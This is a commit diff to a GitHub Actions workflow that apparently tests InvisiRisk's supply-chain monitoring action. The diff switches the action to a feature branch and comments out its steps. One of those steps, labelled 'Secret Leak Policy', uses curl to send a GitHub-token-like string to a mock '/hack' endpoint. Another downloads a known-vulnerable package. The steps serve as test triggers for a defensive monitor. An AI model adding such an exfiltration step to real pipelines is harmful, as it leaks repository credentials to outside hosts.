Update GH IR integration x Dep Tree.yml

diff --git a/.github/workflows/GH IR integration x Dep Tree.yml b/.github/workflows/GH IR integration x Dep Tree.yml
--- a/.github/workflows/GH IR integration x Dep Tree.yml
+++ b/.github/workflows/GH IR integration x Dep Tree.yml
@@ -11,44 +11,44 @@ jobs:
     steps:
       # ============= InvisiRisk Setup =============
       - name: Setup PSE
-        uses: invisirisk/pse-action@latest
+        uses:  invisirisk/pse-action@feature/intermediate-deno-rust-ca-devtest
         with:
-        #  api_url: "https://app.stage.invisirisk.com"
+          api_url: "https://app.stage.invisirisk.com"
           app_token: ${{secrets.IR_API_KEY}}
       # ============= InvisiRisk Setup End =============
-      # Checkout repository
-      - name: Checkout code
-        uses: actions/checkout@v4
+      # # Checkout repository
+      # - name: Checkout code
+      #   uses: actions/checkout@v4
 
-      - name: Use Python
-        uses: actions/setup-python@v4
-        with:
-          python-version: "3.11"
-          cache: "pip"
-          cache-dependency-path: "requirements.txt"
+      # - name: Use Python
+      #   uses: actions/setup-python@v4
+      #   with:
+      #     python-version: "3.11"
+      #     cache: "pip"
+      #     cache-dependency-path: "requirements.txt"
 
-      - name: Install dependencies
-        run: pip install -r requirements.txt
-
-
-      - name: Secret Leak Policy
-        run: |
-          curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
-            -H "Content-Type: application/json" \
-            -d '{
-            "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
-          }'
-          echo "Exit code: $?"
+      # - name: Install dependencies
+      #   run: pip install -r requirements.txt
 
 
-      - name: Install Critical Vulnerable package (in dataset)
-        continue-on-error: true
-        run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/pandasai-0.8.1-py2.py3-none-any.whl
+      # - name: Secret Leak Policy
+      #   run: |
+      #     curl -k -X GET https://vbirmock.free.beeceptor.com/hack \
+      #       -H "Content-Type: application/json" \
+      #       -d '{
+      #       "GH": "ghp_DEFzmg7RHrQ2eMe2IF4NxNWQodYpab3VMXXX"
+      #     }'
+      #     echo "Exit code: $?"
+
+
+      # - name: Install Critical Vulnerable package (in dataset)
+      #   continue-on-error: true
+      #   run: curl -k -O https://files.pythonhosted.org/packages/83/5c/0627be4c9976d56b1217cb5187b7504e7fd7d3503f8bfd312a04077bd4f7/pandasai-0.8.1-py2.py3-none-any.whl
 
       # ============= InvisiRisk Cleanup =============
       - name: Cleanup PSE
         if: always()
-        uses: invisirisk/pse-action@latest
+        uses:  invisirisk/pse-action@feature/intermediate-deno-rust-ca-devtest
         with:
           cleanup: "true"
       # ============= InvisiRisk Cleanup End =============
